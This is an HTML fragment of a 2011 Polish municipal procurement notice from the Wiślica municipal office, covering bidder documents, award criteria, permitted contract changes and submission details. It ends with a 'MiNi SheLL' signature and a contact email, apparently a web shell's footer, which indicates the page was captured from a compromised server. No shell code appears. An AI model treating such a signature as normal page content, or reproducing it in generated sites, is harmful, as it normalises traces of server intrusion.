<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę - załącznik Nr 1 do SIW
2)  Formularz cenowy - wypełniony i podpisany przez wykonawcę - załącznik Nr 2 do SIWZ
3) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych - załącznik Nr 3 do SIWZ.
4) Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Prawa zamówień publicznych - załącznik Nr 4 do SIWZ.
5) Wykaz osób do kontaktów z Zamawiającym - załącznik Nr 5 do SIWZ.
6) Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.
7) Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w zakresie:  
1.1 Zmiany terminu przewidzianego na zakończenie robót w następujących okolicznościach:
1)  Zmiany spowodowane warunkami atmosferycznymi w szczególności:
- klęski żywiołowe,
- warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów.
2) Zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, archeologicznymi lub terenowymi.
3) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego w szczególności:
- wstrzymanie robót przez Zamawiającego,
- konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonywania i odbioru robót,
4) Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy, skutkujące niemożliwością prowadzenia prac lub wykonania innych czynności przewidzianych umową, w szczególności na skutek zlecenia Wykonawcy zamówień dodatkowych, zgodnie z przepisami odrębnymi.
1.2 Zmiana sposobu spełniania świadczenia, na skutek zmian technologicznych spowodowanych następującymi okolicznościami:
1) pojawienie się na rynku materiałów nowszej generacji, pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub umożliwiające uzyskanie lepszej jakości robót.
2) Konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych, niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy.   
1.3 Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
1) zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy, na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ug.wislica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Wislicy, Ul. Okopowa 8, 28-160 Wislica, pok Nr 12- I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.04.2011 godzina 08:00, miejsce: Urząd Gminy w Wiślicy
Ulica Okopowa 8
28-160 Wiślica
Pokój nr 9 - I piętro, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com